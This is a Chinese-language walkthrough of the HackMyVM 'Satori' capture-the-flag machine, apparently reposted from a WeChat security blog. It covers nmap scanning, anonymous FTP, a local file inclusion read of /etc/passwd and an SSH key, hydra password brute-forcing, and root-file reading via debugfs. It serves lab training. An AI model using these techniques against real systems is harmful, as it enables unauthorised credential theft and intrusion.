靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Satori
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Satori
难度: 中等
发布时间: 2021年3月3日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
map -sP 10.0.0.1/24
扫描到主机地址为10.0.0.147
扫描端口
扫描靶机开放的服务端口
nmap -sC -sV -p- 10.0.0.148 -oN nmap.log
扫描到3个开放端口,FTP支持匿名访问,看来看看FTP
FTP匿名访问
ftp 10.0.0.148
anonymous
ls -al
get satori.mkv
文件打开后是一段视频,未发现可利用的信息,来看看80端口。
Web渗透
访问出现一个youtube视频下载功能的页面,源码中找到两个页面,其中stream.php是有参数的,来访问看看
LFI文件包含漏洞
http://10.0.0.148/stream.php?url=
提示没有地址,加上个/etc/passwd试试
http://10.0.0.148/stream.php?url=/etc/passwd
空白页面,再加上伪协议
http://10.0.0.148/stream.php?url=file:///etc/passwd
找到一个用户账号,继续找
http://10.0.0.148/stream.php?url=file:///home/yana/.ssh/id_rsa
无法读取yana用户的id_rsa文件,试试能不能登录ftp
FTP密码暴破
hydra -l yana -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.148
拿到密码,尝试登录SSH
ssh [email protected]
需要key才行,登录ftp
ftp 10.0.0.148
ls -al
get user.txt
cd .ssh
ls -al
get id_rsa
拿到user.txt和key文件,登录SSH
chmod 600 id_rsa
ssh [email protected] -i id_rsa
登录成功,发现yana用户在disk组里,可以使用debugfs虚拟内核加载磁盘读取高权限文件,验证一下
1。检查磁盘名
df -h
2。挂载磁盘
/usr/sbin/debugfs /dev/sda1
cd /root
ls
cat /root.txt
拿到root.txt,游戏结束。(user.txt在ftp中已下载到攻击机上)
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.83 Satori
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论